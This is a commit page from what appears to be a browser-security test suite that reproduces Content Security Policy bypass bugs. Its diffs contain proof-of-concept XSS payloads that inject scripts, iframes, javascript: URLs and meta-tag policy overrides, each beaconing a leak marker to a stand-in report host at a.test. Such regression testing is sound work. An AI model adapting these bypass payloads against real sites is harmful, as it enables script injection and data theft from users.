-
Notifications
You must be signed in to change notification settings - Fork 3
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
* Implement updated experiment naming and integration - Implement new domain names - More lax report acceptance - Modify all existing experiment files to match the new format * Restructure experiment folders. - url_queue.txt files are now placed directly within the associated page folder * Add link to documentation on how to add your own experiments
- Loading branch information
Showing
498 changed files
with
1,236 additions
and
1,042 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,14 @@ | ||
<!DOCTYPE html> | ||
<html> | ||
<head> | ||
<meta charset="utf-8" /> | ||
<title>You can't XSS me</title> | ||
</head> | ||
<body> | ||
<!-- XSS Start --> | ||
<iframe | ||
srcdoc="<script> location.href = 'https://a.test/report/?leak=c1001283'</script>" | ||
></iframe> | ||
<!-- XSS End --> | ||
</body> | ||
</html> |
12 changes: 0 additions & 12 deletions
12
experiments/pages/CSP/c1001283/adition.com/helper/index.html
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,13 +1,13 @@ | ||
<body> | ||
<script> | ||
if(location.ancestorOrigins.length !== 0){ | ||
location.href = "about:srcdoc"; | ||
}else{ | ||
f = document.body.appendChild(document.createElement("iframe")); | ||
f.onload = () => { | ||
frames[0][0].location.href = location.href; | ||
}; | ||
f.src = 'https://adition.com/custom/c1001283/helper'; | ||
} | ||
</script> | ||
</body> | ||
<script> | ||
if (location.ancestorOrigins.length !== 0) { | ||
location.href = "about:srcdoc"; | ||
} else { | ||
f = document.body.appendChild(document.createElement("iframe")); | ||
f.onload = () => { | ||
frames[0][0].location.href = location.href; | ||
}; | ||
f.src = "https://a.test/CSP/c1001283/helper"; | ||
} | ||
</script> | ||
</body> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
https://leak.test/CSP/c1001283/main | ||
https://a.test/report/?leak=baseline |
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,26 +1,25 @@ | ||
(function(){ | ||
|
||
var payload = ` | ||
(function () { | ||
var payload = ` | ||
top.SUCCESS = true; | ||
var o = document.createElement("object"); | ||
o.data = \`https://adition.com/report/?leak=c1064676-object\`; | ||
o.data = \`https://a.test/report/?leak=c1064676-object\`; | ||
document.body.appendChild(o); | ||
var i = document.createElement("iframe"); | ||
i.src = \`https://adition.com/report/?leak=c1064676-iframe\`; | ||
i.src = \`https://a.test/report/?leak=c1064676-iframe\`; | ||
document.body.appendChild(i); | ||
var s = document.createElement("script"); | ||
s.src = \`https://adition.com/report/?leak=c1064676-script\`; | ||
s.src = \`https://a.test/report/?leak=c1064676-script\`; | ||
document.body.appendChild(s); | ||
`; | ||
|
||
document.body.innerHTML+="<iframe id='XXX' src='javascript:" + payload +"'></iframe>"; | ||
setTimeout(function() { | ||
if (!top.SUCCESS) { | ||
XXX.contentWindow.eval(payload); | ||
} | ||
}, 500); | ||
|
||
}()) | ||
document.body.innerHTML += | ||
"<iframe id='XXX' src='javascript:" + payload + "'></iframe>"; | ||
setTimeout(function () { | ||
if (!top.SUCCESS) { | ||
XXX.contentWindow.eval(payload); | ||
} | ||
}, 500); | ||
})(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
https://leak.test/CSP/c1064676/main | ||
https://a.test/report/?leak=baseline |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,12 +1,13 @@ | ||
<!DOCTYPE html> | ||
<html> | ||
<head> | ||
<meta http-equiv="content-security-policy" content="img-src 'self'"> | ||
</head> | ||
<body> | ||
<script> | ||
url = '<meta http-equiv="content-security-policy" content="default-src *"><img src="https://adition.com/report/?leak=c1072719">'; | ||
window.open("javascript:'"+url+"'","_self"); | ||
</script> | ||
</body> | ||
</html> | ||
<head> | ||
<meta http-equiv="content-security-policy" content="img-src 'self'" /> | ||
</head> | ||
<body> | ||
<script> | ||
url = | ||
'<meta http-equiv="content-security-policy" content="default-src *"><img src="https://a.test/report/?leak=c1072719">'; | ||
window.open("javascript:'" + url + "'", "_self"); | ||
</script> | ||
</body> | ||
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
https://leak.test/CSP/c1072719/main | ||
https://a.test/report/?leak=baseline |
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
13 changes: 7 additions & 6 deletions
13
.../CSP/c1074317/adition.com/script/index.js → ...pages/CSP/c1074317/a.test/script/index.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,18 +1,19 @@ | ||
'use strict'; | ||
"use strict"; | ||
|
||
var throw_func = function throw_func() { | ||
throw TypeError('SomeError'); | ||
throw TypeError("SomeError"); | ||
}; | ||
|
||
var draw_image = function draw_image() { | ||
var img = document.createElement('img'); | ||
img.src = 'https://www.gstatic.com/images/branding/googlelogo/2x/googlelogo_dark_color_84x28dp.png'; | ||
var img = document.createElement("img"); | ||
img.src = | ||
"https://www.gstatic.com/images/branding/googlelogo/2x/googlelogo_dark_color_84x28dp.png"; | ||
document.body.appendChild(img); | ||
}; | ||
|
||
setTimeout(function () { | ||
var error_message = document.getElementsByTagName("p")[0].innerHTML; | ||
if (error_message.indexOf("secret_info=123") > -1) { | ||
document.location.href = "https://adition.com/report/?leak=c1074317"; | ||
document.location.href = "https://a.test/report/?leak=c1074317"; | ||
} | ||
}, 1000); | ||
}, 1000); |
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
<script> | ||
eval('location.href = "https://a.test/report/?leak=c1107824";'); | ||
</script> |
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
<iframe src="https://a.test/CSP/c1107824/helper"></iframe> |
This file was deleted.
Oops, something went wrong.
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
https://a.test/CSP/c1107824 | ||
https://a.test/report/?leak=baseline |
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
<iframe id="123" src="about:blank"></iframe> | ||
<script nonce="1337"> | ||
var iframe = document.getElementById("123"); | ||
iframe.onload = function () { | ||
if (iframe.contentDocument.URL === "about:blank") { | ||
iframe.contentDocument.body.innerHTML = | ||
"<iframe/onload='document.location.href=\"https://a.test/report/?leak=c1109167\"'>"; | ||
} | ||
}; | ||
iframe.contentWindow.location.reload(); | ||
</script> |
10 changes: 0 additions & 10 deletions
10
experiments/pages/CSP/c1109167/adition.com/main/index.html
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
https://a.test/CSP/c1109167/main | ||
https://a.test/report/?leak=baseline |
Oops, something went wrong.